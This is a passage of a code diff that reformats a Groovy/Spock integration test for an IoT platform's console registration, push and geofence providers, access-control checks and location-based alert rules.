-        assert consolePushProvider.data.get("token") == "23123213ad2313b0897efd"
+    then: "the console asset should have been created and be correctly configured"
+    assert console != null
+    assert console.getConsoleName().orElse(null) == "Test Console"
+    assert console.getConsoleVersion().orElse(null) == "1.0"
+    assert console.getConsolePlatform().orElse(null) == "Android 7.0"
+    def consoleGeofenceProvider = console.getConsoleProviders().map{
+      it.get("geofence")
+    }.orElse(null)
+    def consolePushProvider = console.getConsoleProviders().map{it.get("push")}.orElse(null)
+    assert consoleGeofenceProvider != null
+    assert consoleGeofenceProvider.version == ORConsoleGeofenceAssetAdapter.NAME
+    assert consoleGeofenceProvider.requiresPermission
+    assert !consoleGeofenceProvider.hasPermission
+    assert !consoleGeofenceProvider.disabled
+    assert consoleGeofenceProvider.data == null
+    assert consolePushProvider != null
+    assert consolePushProvider.version == "fcm"
+    assert consolePushProvider.requiresPermission
+    assert consolePushProvider.hasPermission
+    assert !consolePushProvider.disabled
+    assert consolePushProvider.data.get("token") == "23123213ad2313b0897efd"
 
-        and: "the console should have been linked to the authenticated user"
-        def userAssets = assetStorageService.findUserAssetLinks(keycloakTestSetup.realmBuilding.name, keycloakTestSetup.testuser3Id, consoleId)
-        assert userAssets.size() == 1
-        assert userAssets.get(0).assetName == "Test Console"
+    and: "the console should have been linked to the authenticated user"
+    def userAssets = assetStorageService.findUserAssetLinks(keycloakTestSetup.realmBuilding.name, keycloakTestSetup.testuser3Id, consoleId)
+    assert userAssets.size() == 1
+    assert userAssets.get(0).assetName == "Test Console"
 
-        when: "the console registration is updated"
-        returnedConsoleRegistration.providers.get("geofence").hasPermission = true
-        returnedConsoleRegistration.providers.put("test", new ConsoleProvider(
-                "Test 1.0",
-                false,
-                false,
-                false,
-                false,
-                true,
-                null,
-        ))
-        returnedConsoleRegistration = authenticatedConsoleResource.register(null, returnedConsoleRegistration)
-        console = assetStorageService.find(consoleId, true)
-        testUser3Console1 = console
-        consoleGeofenceProvider = console.getConsoleProviders().map{it.get("geofence")}.orElse(null)
-        consolePushProvider = console.getConsoleProviders().map{it.get("push")}.orElse(null)
-        def consoleTestProvider = console.getConsoleProviders().map{it.get("test")}.orElse(null)
+    when: "the console registration is updated"
+    returnedConsoleRegistration.providers.get("geofence").hasPermission = true
+    returnedConsoleRegistration.providers.put("test", new ConsoleProvider(
+                    "Test 1.0",
+                    false,
+                    false,
+                    false,
+                    false,
+                    true,
+                    null,
+                    ))
+    returnedConsoleRegistration = authenticatedConsoleResource.register(null, returnedConsoleRegistration)
+    console = assetStorageService.find(consoleId, true)
+    testUser3Console1 = console
+    consoleGeofenceProvider = console.getConsoleProviders().map{it.get("geofence")}.orElse(null)
+    consolePushProvider = console.getConsoleProviders().map{it.get("push")}.orElse(null)
+    def consoleTestProvider = console.getConsoleProviders().map{it.get("test")}.orElse(null)
 
-        then: "the returned console should contain the updated data and have the same id"
-        assert returnedConsoleRegistration.getId() == consoleId
-        assert console != null
-        assert consoleGeofenceProvider != null
-        assert consoleGeofenceProvider.version == ORConsoleGeofenceAssetAdapter.NAME
-        assert consoleGeofenceProvider.requiresPermission
-        assert consoleGeofenceProvider.hasPermission
-        assert !consoleGeofenceProvider.disabled
-        assert consoleGeofenceProvider.data == null
-        assert consolePushProvider != null
-        assert consolePushProvider.version == "fcm"
-        assert consolePushProvider.requiresPermission
-        assert consolePushProvider.hasPermission
-        assert !consolePushProvider.disabled
-        assert consolePushProvider.data.get("token") == "23123213ad2313b0897efd"
-        assert consoleTestProvider != null
-        assert consoleTestProvider.version == "Test 1.0"
-        assert !consoleTestProvider.requiresPermission
-        assert !consoleTestProvider.hasPermission
-        assert consoleTestProvider.disabled
-        assert consoleTestProvider.data == null
+    then: "the returned console should contain the updated data and have the same id"
+    assert returnedConsoleRegistration.getId() == consoleId
+    assert console != null
+    assert consoleGeofenceProvider != null
+    assert consoleGeofenceProvider.version == ORConsoleGeofenceAssetAdapter.NAME
+    assert consoleGeofenceProvider.requiresPermission
+    assert consoleGeofenceProvider.hasPermission
+    assert !consoleGeofenceProvider.disabled
+    assert consoleGeofenceProvider.data == null
+    assert consolePushProvider != null
+    assert consolePushProvider.version == "fcm"
+    assert consolePushProvider.requiresPermission
+    assert consolePushProvider.hasPermission
+    assert !consolePushProvider.disabled
+    assert consolePushProvider.data.get("token") == "23123213ad2313b0897efd"
+    assert consoleTestProvider != null
+    assert consoleTestProvider.version == "Test 1.0"
+    assert !consoleTestProvider.requiresPermission
+    assert !consoleTestProvider.hasPermission
+    assert consoleTestProvider.disabled
+    assert consoleTestProvider.data == null
 
-        when: "the console registration is updated anonymously"
-        returnedConsoleRegistration.providers.get("test").disabled = false
-        anonymousConsoleResource.register(null, returnedConsoleRegistration)
+    when: "the console registration is updated anonymously"
+    returnedConsoleRegistration.providers.get("test").disabled = false
+    anonymousConsoleResource.register(null, returnedConsoleRegistration)
 
-        then: "the result should be forbidden"
-        WebApplicationException ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            return true
-        }
+    then: "the result should be forbidden"
+    WebApplicationException ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      return true
+    }
 
-        when: "the console registration is reloaded after the rejected anonymous update"
-        console = assetStorageService.find(consoleId, true)
-        testUser3Console1 = console
-        consoleTestProvider = console.getConsoleProviders().map{it.get("test")}.orElse(null)
+    when: "the console registration is reloaded after the rejected anonymous update"
+    console = assetStorageService.find(consoleId, true)
+    testUser3Console1 = console
+    consoleTestProvider = console.getConsoleProviders().map{it.get("test")}.orElse(null)
 
-        then: "the console registration should be unchanged"
-        assert console != null
-        assert consoleGeofenceProvider != null
-        assert consoleGeofenceProvider.version == ORConsoleGeofenceAssetAdapter.NAME
-        assert consoleGeofenceProvider.requiresPermission
-        assert consoleGeofenceProvider.hasPermission
-        assert !consoleGeofenceProvider.disabled
-        assert consoleGeofenceProvider.data == null
-        assert consolePushProvider != null
-        assert consolePushProvider.version == "fcm"
-        assert consolePushProvider.requiresPermission
-        assert consolePushProvider.hasPermission
-        assert !consolePushProvider.disabled
-        assert consolePushProvider.data.get("token") == "23123213ad2313b0897efd"
-        assert consoleTestProvider != null
-        assert consoleTestProvider.version == "Test 1.0"
-        assert !consoleTestProvider.requiresPermission
-        assert !consoleTestProvider.hasPermission
-        assert consoleTestProvider.disabled
-        assert consoleTestProvider.data == null
+    then: "the console registration should be unchanged"
+    assert console != null
+    assert consoleGeofenceProvider != null
+    assert consoleGeofenceProvider.version == ORConsoleGeofenceAssetAdapter.NAME
+    assert consoleGeofenceProvider.requiresPermission
+    assert consoleGeofenceProvider.hasPermission
+    assert !consoleGeofenceProvider.disabled
+    assert consoleGeofenceProvider.data == null
+    assert consolePushProvider != null
+    assert consolePushProvider.version == "fcm"
+    assert consolePushProvider.requiresPermission
+    assert consolePushProvider.hasPermission
+    assert !consolePushProvider.disabled
+    assert consolePushProvider.data.get("token") == "23123213ad2313b0897efd"
+    assert consoleTestProvider != null
+    assert consoleTestProvider.version == "Test 1.0"
+    assert !consoleTestProvider.requiresPermission
+    assert !consoleTestProvider.hasPermission
+    assert consoleTestProvider.disabled
+    assert consoleTestProvider.data == null
 
-        when: "a console registers with the id of another existing asset"
-        consoleRegistration.setId(managerTestSetup.thingId)
-        authenticatedConsoleResource.register(null, consoleRegistration)
+    when: "a console registers with the id of another existing asset"
+    consoleRegistration.setId(managerTestSetup.thingId)
+    authenticatedConsoleResource.register(null, consoleRegistration)
 
-        then: "the result should be bad request"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 400
-            return true
-        }
+    then: "the result should be bad request"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 400
+      return true
+    }
 
-        when: "a console registers with an id that doesn't exist"
-        def unusedId = UniqueIdentifierGenerator.generateId("UnusedConsoleId")
-        consoleRegistration.setId(unusedId)
-        authenticatedConsoleResource.register(null, consoleRegistration)
+    when: "a console registers with an id that doesn't exist"
+    def unusedId = UniqueIdentifierGenerator.generateId("UnusedConsoleId")
+    consoleRegistration.setId(unusedId)
+    authenticatedConsoleResource.register(null, consoleRegistration)
 
-        then: "the result should be conflict"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 409
-            return true
-        }
-        assert assetStorageService.find(unusedId, true) == null
+    then: "the result should be conflict"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 409
+      return true
+    }
+    assert assetStorageService.find(unusedId, true) == null
 
-        when: "a second console is registered without a client supplied id"
-        consoleRegistration.setId(null)
-        returnedConsoleRegistration = authenticatedConsoleResource.register(null, consoleRegistration)
-        console = assetStorageService.find(returnedConsoleRegistration.getId(), true)
-        testUser3Console2 = console
-        consoleGeofenceProvider = console.getConsoleProviders().map{it.get("geofence")}.orElse(null)
-        consolePushProvider = console.getConsoleProviders().map{it.get("push")}.orElse(null)
+    when: "a second console is registered without a client supplied id"
+    consoleRegistration.setId(null)
+    returnedConsoleRegistration = authenticatedConsoleResource.register(null, consoleRegistration)
+    console = assetStorageService.find(returnedConsoleRegistration.getId(), true)
+    testUser3Console2 = console
+    consoleGeofenceProvider = console.getConsoleProviders().map{it.get("geofence")}.orElse(null)
+    consolePushProvider = console.getConsoleProviders().map{it.get("push")}.orElse(null)
 
-        then: "the console should be registered successfully and the returned console should match the supplied console"
-        assert console != null
-        assert console.getConsoleName().orElse(null) == "Test Console"
-        assert console.getConsoleVersion().orElse(null) == "1.0"
-        assert console.getConsolePlatform().orElse(null) == "Android 7.0"
-        assert consoleGeofenceProvider != null
-        assert consoleGeofenceProvider.version == ORConsoleGeofenceAssetAdapter.NAME
-        assert consoleGeofenceProvider.requiresPermission
-        assert !consoleGeofenceProvider.hasPermission
-        assert !consoleGeofenceProvider.disabled
-        assert consoleGeofenceProvider.data == null
-        assert consolePushProvider != null
-        assert consolePushProvider.version == "fcm"
-        assert consolePushProvider.requiresPermission
-        assert consolePushProvider.hasPermission
-        assert !consolePushProvider.disabled
-        assert consolePushProvider.data.get("token") == "23123213ad2313b0897efd"
+    then: "the console should be registered successfully and the returned console should match the supplied console"
+    assert console != null
+    assert console.getConsoleName().orElse(null) == "Test Console"
+    assert console.getConsoleVersion().orElse(null) == "1.0"
+    assert console.getConsolePlatform().orElse(null) == "Android 7.0"
+    assert consoleGeofenceProvider != null
+    assert consoleGeofenceProvider.version == ORConsoleGeofenceAssetAdapter.NAME
+    assert consoleGeofenceProvider.requiresPermission
+    assert !consoleGeofenceProvider.hasPermission
+    assert !consoleGeofenceProvider.disabled
+    assert consoleGeofenceProvider.data == null
+    assert consolePushProvider != null
+    assert consolePushProvider.version == "fcm"
+    assert consolePushProvider.requiresPermission
+    assert consolePushProvider.hasPermission
+    assert !consolePushProvider.disabled
+    assert consolePushProvider.data.get("token") == "23123213ad2313b0897efd"
 
-        when: "an invalid console registration is registered"
-        def invalidRegistration = new ConsoleRegistration(null, null, "1.0", null, null, null, null)
-        authenticatedConsoleResource.register(null, invalidRegistration)
+    when: "an invalid console registration is registered"
+    def invalidRegistration = new ConsoleRegistration(null, null, "1.0", null, null, null, null)
+    authenticatedConsoleResource.register(null, invalidRegistration)
 
-        then: "the result should be bad request"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 400
-            return true
-        }
+    then: "the result should be bad request"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 400
+      return true
+    }
 
-        when: "a console is registered anonymously"
-        consoleRegistration.id = null
-        returnedConsoleRegistration = anonymousConsoleResource.register(null, consoleRegistration)
-        consoleId = returnedConsoleRegistration.getId()
-        console = assetStorageService.find(consoleId, true)
-        anonymousConsole1 = console
-        consoleGeofenceProvider = console.getConsoleProviders().map{it.get("geofence")}.orElse(null)
-        consolePushProvider = console.getConsoleProviders().map{it.get("push")}.orElse(null)
-        userAssets = assetStorageService.findUserAssetLinks(null, null, consoleId)
+    when: "a console is registered anonymously"
+    consoleRegistration.id = null
+    returnedConsoleRegistration = anonymousConsoleResource.register(null, consoleRegistration)
+    consoleId = returnedConsoleRegistration.getId()
+    console = assetStorageService.find(consoleId, true)
+    anonymousConsole1 = console
+    consoleGeofenceProvider = console.getConsoleProviders().map{it.get("geofence")}.orElse(null)
+    consolePushProvider = console.getConsoleProviders().map{it.get("push")}.orElse(null)
+    userAssets = assetStorageService.findUserAssetLinks(null, null, consoleId)
 
-        then: "the console asset should have been created and be correctly configured"
-        assert !isNullOrEmpty(consoleId)
-        assert console != null
-        assert console.getConsoleName().orElse(null) == "Test Console"
-        assert console.getConsoleVersion().orElse(null) == "1.0"
-        assert console.getConsolePlatform().orElse(null) == "Android 7.0"
-        assert consoleGeofenceProvider != null
-        assert consoleGeofenceProvider.version == ORConsoleGeofenceAssetAdapter.NAME
-        assert consoleGeofenceProvider.requiresPermission
-        assert !consoleGeofenceProvider.hasPermission
-        assert !consoleGeofenceProvider.disabled
-        assert consoleGeofenceProvider.data == null
-        assert consolePushProvider != null
-        assert consolePushProvider.version == "fcm"
-        assert consolePushProvider.requiresPermission
-        assert consolePushProvider.hasPermission
-        assert !consolePushProvider.disabled
-        assert consolePushProvider.data.get("token") == "23123213ad2313b0897efd"
+    then: "the console asset should have been created and be correctly configured"
+    assert !isNullOrEmpty(consoleId)
+    assert console != null
+    assert console.getConsoleName().orElse(null) == "Test Console"
+    assert console.getConsoleVersion().orElse(null) == "1.0"
+    assert console.getConsolePlatform().orElse(null) == "Android 7.0"
+    assert consoleGeofenceProvider != null
+    assert consoleGeofenceProvider.version == ORConsoleGeofenceAssetAdapter.NAME
+    assert consoleGeofenceProvider.requiresPermission
+    assert !consoleGeofenceProvider.hasPermission
+    assert !consoleGeofenceProvider.disabled
+    assert consoleGeofenceProvider.data == null
+    assert consolePushProvider != null
+    assert consolePushProvider.version == "fcm"
+    assert consolePushProvider.requiresPermission
+    assert consolePushProvider.hasPermission
+    assert !consolePushProvider.disabled
+    assert consolePushProvider.data.get("token") == "23123213ad2313b0897efd"
 
-        and: "the console should not have been linked to any users"
-        assert userAssets.isEmpty()
+    and: "the console should not have been linked to any users"
+    assert userAssets.isEmpty()
 
-        when: "the location of each console is marked as RULE_STATE"
-        testUser3Console1.getAttribute(Asset.LOCATION).ifPresent {it -> it.addMeta(
-                new MetaItem<>(MetaItemType.RULE_STATE),
-                new MetaItem<>(MetaItemType.ACCESS_RESTRICTED_WRITE),
-                new MetaItem<>(MetaItemType.ACCESS_RESTRICTED_READ)
-        )}
-        testUser3Console1 = assetStorageService.merge(testUser3Console1)
-        testUser3Console2.getAttribute(Asset.LOCATION).ifPresent {it -> it.addMeta(
-                new MetaItem<>(MetaItemType.RULE_STATE),
-                new MetaItem<>(MetaItemType.ACCESS_RESTRICTED_WRITE),
-                new MetaItem<>(MetaItemType.ACCESS_RESTRICTED_READ)
-        )}
-        testUser3Console2 = assetStorageService.merge(testUser3Console2)
-        anonymousConsole1.getAttribute(Asset.LOCATION).ifPresent {it -> it.addMeta(
-                new MetaItem<>(MetaItemType.RULE_STATE),
-                new MetaItem<>(MetaItemType.ACCESS_RESTRICTED_WRITE),
-                new MetaItem<>(MetaItemType.ACCESS_RESTRICTED_READ)
-        )}
-        anonymousConsole1 = assetStorageService.merge(anonymousConsole1)
+    when: "the location of each console is marked as RULE_STATE"
+    testUser3Console1.getAttribute(Asset.LOCATION).ifPresent {it ->
+      it.addMeta(
+      new MetaItem<>(MetaItemType.RULE_STATE),
+      new MetaItem<>(MetaItemType.ACCESS_RESTRICTED_WRITE),
+      new MetaItem<>(MetaItemType.ACCESS_RESTRICTED_READ)
+      )
+    }
+    testUser3Console1 = assetStorageService.merge(testUser3Console1)
+    testUser3Console2.getAttribute(Asset.LOCATION).ifPresent {it ->
+      it.addMeta(
+      new MetaItem<>(MetaItemType.RULE_STATE),
+      new MetaItem<>(MetaItemType.ACCESS_RESTRICTED_WRITE),
+      new MetaItem<>(MetaItemType.ACCESS_RESTRICTED_READ)
+      )
+    }
+    testUser3Console2 = assetStorageService.merge(testUser3Console2)
+    anonymousConsole1.getAttribute(Asset.LOCATION).ifPresent {it ->
+      it.addMeta(
+      new MetaItem<>(MetaItemType.RULE_STATE),
+      new MetaItem<>(MetaItemType.ACCESS_RESTRICTED_WRITE),
+      new MetaItem<>(MetaItemType.ACCESS_RESTRICTED_READ)
+      )
+    }
+    anonymousConsole1 = assetStorageService.merge(anonymousConsole1)
 
-        then: "each created consoles should have been sent notifications to refresh their geofences"
-        conditions.eventually {
-            assert notificationIds.size() == 3
-            assert messages.any {it == "${testUser3Console1.id}_GEOFENCE_REFRESH"}
-            assert messages.any {it == "${testUser3Console2.id}_GEOFENCE_REFRESH"}
-            assert messages.any {it == "${anonymousConsole1.id}_GEOFENCE_REFRESH"}
-        }
+    then: "each created consoles should have been sent notifications to refresh their geofences"
+    conditions.eventually {
+      assert notificationIds.size() == 3
+      assert messages.any {it == "${testUser3Console1.id}_GEOFENCE_REFRESH"}
+      assert messages.any {it == "${testUser3Console2.id}_GEOFENCE_REFRESH"}
+      assert messages.any {it == "${anonymousConsole1.id}_GEOFENCE_REFRESH"}
+    }
 
-        ////////////////////////////////////////////////////
-        // LOCATION PREDICATE AND ALERT NOTIFICATION TESTS
-        ////////////////////////////////////////////////////
+    ////////////////////////////////////////////////////
+    // LOCATION PREDICATE AND ALERT NOTIFICATION TESTS
+    ////////////////////////////////////////////////////
 
-        when: "notifications are cleared"
-        notificationIds.clear()
-        targetIds.clear()
-        targetTypes.clear()
-        messages.clear()
+    when: "notifications are cleared"
+    notificationIds.clear()
+    targetIds.clear()
+    targetTypes.clear()
+    messages.clear()
 
-        and: "an authenticated user updates the location of a linked console"
-        authenticatedAssetResource.writeAttributeValue(null, testUser3Console1.id, Asset.LOCATION.name, new GeoJSONPoint(0d, 0d, 0d))
+    and: "an authenticated user updates the location of a linked console"
+    authenticatedAssetResource.writeAttributeValue(null, testUser3Console1.id, Asset.LOCATION.name, new GeoJSONPoint(0d, 0d, 0d))
 
-        then: "the consoles location should have been updated"
-        conditions.eventually {
-            testUser3Console1 = assetStorageService.find(testUser3Console1.id, true)
-            assert testUser3Console1 != null
-            def assetLocation = testUser3Console1.getLocation().orElse(null)
-            assert assetLocation != null
-            assert assetLocation.x == 0d
-            assert assetLocation.y == 0d
-            assert assetLocation.z == 0d
-        }
-// TODO: Update once console permissions model finalised
-//        when: "an anonymous user updates the location of a console linked to users"
-//        anonymousAssetResource.writeAttributeValue(null, testUser3Console1.id, LOCATION.name, new GeoJSONPoint(0d, 0d, 0d).objectToValue())
-//
-//        then: "the result should be forbidden"
-//        ex = thrown()
-//        ex.response.withCloseable { r ->
-//            assert r.status == 403
-//        }
+    then: "the consoles location should have been updated"
+    conditions.eventually {
+      testUser3Console1 = assetStorageService.find(testUser3Console1.id, true)
+      assert testUser3Console1 != null
+      def assetLocation = testUser3Console1.getLocation().orElse(null)
+      assert assetLocation != null
+      assert assetLocation.x == 0d
+      assert assetLocation.y == 0d
+      assert assetLocation.z == 0d
+    }
+    // TODO: Update once console permissions model finalised
+    //        when: "an anonymous user updates the location of a console linked to users"
+    //        anonymousAssetResource.writeAttributeValue(null, testUser3Console1.id, LOCATION.name, new GeoJSONPoint(0d, 0d, 0d).objectToValue())
+    //
+    //        then: "the result should be forbidden"
+    //        ex = thrown()
+    //        ex.response.withCloseable { r ->
+    //            assert r.status == 403
+    //        }
 
-        when: "a console's location is updated to be at the Smart Building"
-        authenticatedAssetResource.writeAttributeValue(null, testUser3Console2.id, Asset.LOCATION.name, SMART_BUILDING_LOCATION)
-        long timestamp = Long.MAX_VALUE
+    when: "a console's location is updated to be at the Smart Building"
+    authenticatedAssetResource.writeAttributeValue(null, testUser3Console2.id, Asset.LOCATION.name, SMART_BUILDING_LOCATION)
+    long timestamp = Long.MAX_VALUE
 
-        then: "a welcome home alert should be sent to the console"
-        conditions.eventually {
-            assert notificationIds.size() == 1
-            def asset = assetStorageService.find(testUser3Console2.id, true)
-            assert asset != null
-            timestamp = asset.getAttribute(Asset.LOCATION.name).flatMap { it.timestamp }.orElse(Long.MAX_VALUE)
-        }
+    then: "a welcome home alert should be sent to the console"
+    conditions.eventually {
+      assert notificationIds.size() == 1
+      def asset = assetStorageService.find(testUser3Console2.id, true)
+      assert asset != null
+      timestamp = asset.getAttribute(Asset.LOCATION.name).flatMap {
+        it.timestamp
+      }.orElse(Long.MAX_VALUE)
+    }
 
-        when: "time advances"
-        advancePseudoClock(1, TimeUnit.SECONDS, container)
+    when: "time advances"
+    advancePseudoClock(1, TimeUnit.SECONDS, container)
 
-        and: "a console's location is updated to be at the Smart Building again"
-        authenticatedAssetResource.writeAttributeValue(null, testUser3Console2.id, Asset.LOCATION.name, SMART_BUILDING_LOCATION)
+    and: "a console's location is updated to be at the Smart Building again"
+    authenticatedAssetResource.writeAttributeValue(null, testUser3Console2.id, Asset.LOCATION.name, SMART_BUILDING_LOCATION)
 
-        then: "no more alerts should have been sent"
-        conditions.eventually {
-            def asset = assetStorageService.find(testUser3Console2.id, true)
-            assert asset != null
-            assert asset.getAttribute(Asset.LOCATION.name).flatMap { it.timestamp }.orElse(Long.MIN_VALUE) > timestamp
-            timestamp = asset.getAttribute(Asset.LOCATION.name).flatMap { it.timestamp }.orElse(Long.MIN_VALUE)
-            assert notificationIds.size() == 1
-        }
+    then: "no more alerts should have been sent"
+    conditions.eventually {
+      def asset = assetStorageService.find(testUser3Console2.id, true)
+      assert asset != null
+      assert asset.getAttribute(Asset.LOCATION.name).flatMap {
+        it.timestamp
+      }.orElse(Long.MIN_VALUE) > timestamp
+      timestamp = asset.getAttribute(Asset.LOCATION.name).flatMap {
+        it.timestamp
+      }.orElse(Long.MIN_VALUE)
+      assert notificationIds.size() == 1
+    }
 
-        when: "time advances"
-        advancePseudoClock(1, TimeUnit.SECONDS, container)
+    when: "time advances"
+    advancePseudoClock(1, TimeUnit.SECONDS, container)
 
-        and: "a console's location is updated to be null"
-        authenticatedAssetResource.writeAttributeValue(null, testUser3Console2.id, Asset.LOCATION.name, null)
+    and: "a console's location is updated to be null"
+    authenticatedAssetResource.writeAttributeValue(null, testUser3Console2.id, Asset.LOCATION.name, null)
 
-        then: "no more alerts should have been sent and the welcome reset rule should have fired on the realm rule engine"
-        conditions.eventually {
-            def asset = assetStorageService.find(testUser3Console2.id, true)
-            assert asset != null
-            assert asset.getAttribute(Asset.LOCATION.name).flatMap { it.timestamp }.orElse(Long.MIN_VALUE) > timestamp
-            assert notificationIds.size() == 1
-            def realmBuildingEngine = rulesService.realmEngines.get(keycloakTestSetup.realmBuilding.name)
-            assert realmBuildingEngine != null
-            assert realmBuildingEngine.isRunning()
-            assert !realmBuildingEngine.facts.getOptional("welcomeHome_${testUser3Console2.id}").isPresent()
-        }
+    then: "no more alerts should have been sent and the welcome reset rule should have fired on the realm rule engine"
+    conditions.eventually {
+      def asset = assetStorageService.find(testUser3Console2.id, true)
+      assert asset != null
+      assert asset.getAttribute(Asset.LOCATION.name).flatMap {
+        it.timestamp
+      }.orElse(Long.MIN_VALUE) > timestamp
+      assert notificationIds.size() == 1
+      def realmBuildingEngine = rulesService.realmEngines.get(keycloakTestSetup.realmBuilding.name)
+      assert realmBuildingEngine != null
+      assert realmBuildingEngine.isRunning()
+      assert !realmBuildingEngine.facts.getOptional("welcomeHome_${testUser3Console2.id}").isPresent()
+    }
 
-        when: "time advances"
-        advancePseudoClock(1, TimeUnit.SECONDS, container)
+    when: "time advances"
+    advancePseudoClock(1, TimeUnit.SECONDS, container)
 
-        and: "a console's location is updated to be at the Smart Building again"
-        authenticatedAssetResource.writeAttributeValue(null, testUser3Console2.id, Asset.LOCATION.name, SMART_BUILDING_LOCATION)
+    and: "a console's location is updated to be at the Smart Building again"
+    authenticatedAssetResource.writeAttributeValue(null, testUser3Console2.id, Asset.LOCATION.name, SMART_BUILDING_LOCATION)
 
-        then: "another alert should have been sent"
-        conditions.eventually {
-            assert notificationIds.size() == 2
-        }
+    then: "another alert should have been sent"
+    conditions.eventually {
+      assert notificationIds.size() == 2
+    }
 
-        ///////////////////////////////////////
-        // GEOFENCE PROVIDER TESTS
-        ///////////////////////////////////////
+    ///////////////////////////////////////
+    // GEOFENCE PROVIDER TESTS
+    ///////////////////////////////////////
 
-        when: "the geofences of a user linked console are requested by the authenticated user"
-        notificationIds.clear()
-        messages.clear()
-        def geofences = authenticatedRulesResource.getAssetGeofences(null, testUser3Console1.id)
-        def expectedLocationPredicate = new RadialGeofencePredicate(100, SMART_BUILDING_LOCATION.y, SMART_BUILDING_LOCATION.x)
+    when: "the geofences of a user linked console are requested by the authenticated user"
+    notificationIds.clear()
+    messages.clear()
+    def geofences = authenticatedRulesResource.getAssetGeofences(null, testUser3Console1.id)
+    def expectedLocationPredicate = new RadialGeofencePredicate(100, SMART_BUILDING_LOCATION.y, SMART_BUILDING_LOCATION.x)
 
-        then: "the welcome home geofence should be retrieved"
-        assert expectedLocationPredicate.centrePoint.size() == 2
-        assert expectedLocationPredicate.centrePoint[0] == expectedLocationPredicate.lng
-        assert expectedLocationPredicate.centrePoint[1] == expectedLocationPredicate.lat
-        assert geofences.size() == 1
-        assert geofences[0].id == testUser3Console1.id + "_" + Integer.toString(expectedLocationPredicate.hashCode())
-        assert geofences[0].lat == expectedLocationPredicate.lat
-        assert geofences[0].lng == expectedLocationPredicate.lng
-        assert geofences[0].radius == expectedLocationPredicate.radius
-        assert geofences[0].httpMethod == WRITE_ATTRIBUTE_HTTP_METHOD
-        assert geofences[0].url == getWriteAttributeUrl(new AttributeRef(testUser3Console1.id, Asset.LOCATION.name))
+    then: "the welcome home geofence should be retrieved"
+    assert expectedLocationPredicate.centrePoint.size() == 2
+    assert expectedLocationPredicate.centrePoint[0] == expectedLocationPredicate.lng
+    assert expectedLocationPredicate.centrePoint[1] == expectedLocationPredicate.lat
+    assert geofences.size() == 1
+    assert geofences[0].id == testUser3Console1.id + "_" + Integer.toString(expectedLocationPredicate.hashCode())
+    assert geofences[0].lat == expectedLocationPredicate.lat
+    assert geofences[0].lng == expectedLocationPredicate.lng
+    assert geofences[0].radius == expectedLocationPredicate.radius
+    assert geofences[0].httpMethod == WRITE_ATTRIBUTE_HTTP_METHOD
+    assert geofences[0].url == getWriteAttributeUrl(new AttributeRef(testUser3Console1.id, Asset.LOCATION.name))
 
-// TODO: Update once console permissions model finalised
-//        when: "an anonymous user tries to retrieve the geofences of a console linked to users"
-//        geofences = anonymousRulesResource.getAssetGeofences(null, testUser3Console1.id)
-//
-//        then: "the result should be a forbidden request"
-//        ex = thrown()
-//        ex.response.withCloseable { r ->
-//            assert r.status == 403
-//        }
+    // TODO: Update once console permissions model finalised
+    //        when: "an anonymous user tries to retrieve the geofences of a console linked to users"
+    //        geofences = anonymousRulesResource.getAssetGeofences(null, testUser3Console1.id)
+    //
+    //        then: "the result should be a forbidden request"
+    //        ex = thrown()
+    //        ex.response.withCloseable { r ->
+    //            assert r.status == 403
+    //        }
 
-        when: "the geofences of testUser3Console2 are retrieved"
-        geofences = authenticatedRulesResource.getAssetGeofences(null, testUser3Console2.id)
+    when: "the geofences of testUser3Console2 are retrieved"
+    geofences = authenticatedRulesResource.getAssetGeofences(null, testUser3Console2.id)
 
-        then: "the welcome home geofence should be retrieved"
-        assert geofences.size() == 1
-        assert geofences[0].id == testUser3Console2.id + "_" + Integer.toString(expectedLocationPredicate.hashCode())
-        assert geofences[0].lat == expectedLocationPredicate.lat
-        assert geofences[0].lng == expectedLocationPredicate.lng
-        assert geofences[0].radius == expectedLocationPredicate.radius
-        assert geofences[0].httpMethod == WRITE_ATTRIBUTE_HTTP_METHOD
-        assert geofences[0].url == getWriteAttributeUrl(new AttributeRef(testUser3Console2.id, Asset.LOCATION.name))
+    then: "the welcome home geofence should be retrieved"
+    assert geofences.size() == 1
+    assert geofences[0].id == testUser3Console2.id + "_" + Integer.toString(expectedLocationPredicate.hashCode())
+    assert geofences[0].lat == expectedLocationPredicate.lat
+    assert geofences[0].lng == expectedLocationPredicate.lng
+    assert geofences[0].radius == expectedLocationPredicate.radius
+    assert geofences[0].httpMethod == WRITE_ATTRIBUTE_HTTP_METHOD
+    assert geofences[0].url == getWriteAttributeUrl(new AttributeRef(testUser3Console2.id, Asset.LOCATION.name))
 
-        when: "the geofences of anonymousConsole1 are retrieved"
-        geofences = anonymousRulesResource.getAssetGeofences(null, anonymousConsole1.id)
+    when: "the geofences of anonymousConsole1 are retrieved"
+    geofences = anonymousRulesResource.getAssetGeofences(null, anonymousConsole1.id)
 
-        then: "the welcome home geofence should be retrieved"
-        assert geofences.size() == 1
-        assert geofences[0].id == anonymousConsole1.id + "_" + Integer.toString(expectedLocationPredicate.hashCode())
-        assert geofences[0].lat == expectedLocationPredicate.lat
-        assert geofences[0].lng == expectedLocationPredicate.lng
-        assert geofences[0].radius == expectedLocationPredicate.radius
-        assert geofences[0].httpMethod == WRITE_ATTRIBUTE_HTTP_METHOD
-        assert geofences[0].url == getWriteAttributeUrl(new AttributeRef(anonymousConsole1.id, Asset.LOCATION.name))
+    then: "the welcome home geofence should be retrieved"
+    assert geofences.size() == 1
+    assert geofences[0].id == anonymousConsole1.id + "_" + Integer.toString(expectedLocationPredicate.hashCode())
+    assert geofences[0].lat == expectedLocationPredicate.lat
+    assert geofences[0].lng == expectedLocationPredicate.lng
+    assert geofences[0].radius == expectedLocationPredicate.radius
+    assert geofences[0].httpMethod == WRITE_ATTRIBUTE_HTTP_METHOD
+    assert geofences[0].url == getWriteAttributeUrl(new AttributeRef(anonymousConsole1.id, Asset.LOCATION.name))
 
-        when: "the geofences of a non-existent console are retrieved"
-        geofences = anonymousRulesResource.getAssetGeofences(null, UniqueIdentifierGenerator.generateId("nonExistentConsole"))
+    when: "the geofences of a non-existent console are retrieved"
